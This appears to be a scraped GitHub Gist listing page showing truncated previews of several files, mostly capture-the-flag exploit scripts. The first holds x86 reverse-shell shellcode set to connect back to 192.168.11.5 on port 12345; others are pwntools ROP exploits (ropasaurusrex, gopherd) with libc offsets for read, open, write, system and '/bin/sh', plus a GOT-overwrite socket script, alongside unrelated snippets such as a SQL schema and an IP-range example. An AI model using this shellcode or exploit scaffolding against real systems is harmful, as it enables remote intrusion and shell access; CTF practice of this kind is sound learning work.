This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import socket | |
| #LHOST=192.168.11.5, LPORT=12345, | |
| shellcode = ( | |
| "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" + | |
| "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x0b" + | |
| "\x05\x68\x02\x00\x30\x39\x89\xe1\xb0\x66\x50\x51\x53\xb3" + | |
| "\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ipaddress import ip_address, summarize_address_range | |
| first = ip_address(u'192.168.1.0') | |
| last = ip_address(u'192.168.1.255') | |
| print list(summarize_address_range(first, last)) | |
| # output | |
| # [IPv4Network(u'192.168.1.0/24')] |
otms61
/ gopherd.py
Last active
August 29, 2015 14:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from struct import pack, unpack | |
| from time import sleep | |
| # Use own libc_read, libc_open, libc_write and libc_binsh address | |
| libc_read = 0xdb460 # 000db460 <__read> | |
| libc_open = 0xdafd0 # 000dafd0 <__open> | |
| libc_write = 0xdb4e0 # 000db4e0 <__write> | |
| # $ strings -a -t x libc.so.6 | grep "/bin/sh" | |
| # 1612c4 /bin/sh |
otms61
/ gopherd2.py
Created
December 21, 2014 09:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from pwnlib.tubes.remote import remote | |
| from struct import pack, unpack | |
| from time import sleep | |
| def main(): | |
| t = remote('localhost', 2233, timeout=1000) |
otms61
/ ropasaurusrex.py
Last active
August 29, 2015 14:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from struct import pack, unpack | |
| from time import sleep | |
| # use own libc_read and libc_system address | |
| libc_read = 0xdb460 # 000db460 <__read> | |
| libc_system = 0x40100 # 00040100 <__libc_system>: | |
| write_plt = 0x804830c # write@plt = 0x804830c | |
| read_plt = 0x804832c # read@plt = 0x804832c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from pwnlib.tubes.remote import remote | |
| from struct import pack, unpack | |
| from time import sleep | |
| from pdb import set_trace | |
| t = remote('localhost', 6666, timeout=1000) | |
| WRITE_COMMAND = '1' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| from time import sleep | |
| # XXX: use your libc address | |
| #0000000000021dd0 T __libc_start_main | |
| libc_start_main_offset = 0x21dd0 | |
| #0000000000046530 W system | |
| libc_system_offset = 0x46530 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CREATE TABLE `todos` ( | |
| `user` int(11) DEFAULT NULL, | |
| `content` varchar(255) DEFAULT NULL | |
| ) ENGINE=InnoDB DEFAULT CHARSET=latin1; | |
| CREATE TABLE `users` ( | |
| `id` int(11) NOT NULL AUTO_INCREMENT, | |
| `name` varchar(255) DEFAULT NULL, | |
| `salt` varchar(255) DEFAULT NULL, | |
| `hash` varchar(255) DEFAULT NULL, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| struct heap | |
| { | |
| int head; | |
| int next; | |
| int prev; | |
| /* data */ | |
| }; | |
| int notes[0x3fe]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import socket, struct, re, telnetlib | |
| import time | |
| puts_got = 0x804a008 | |
| def sock(remoteip, remoteport): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((remoteip, remoteport)) |
OlderNewer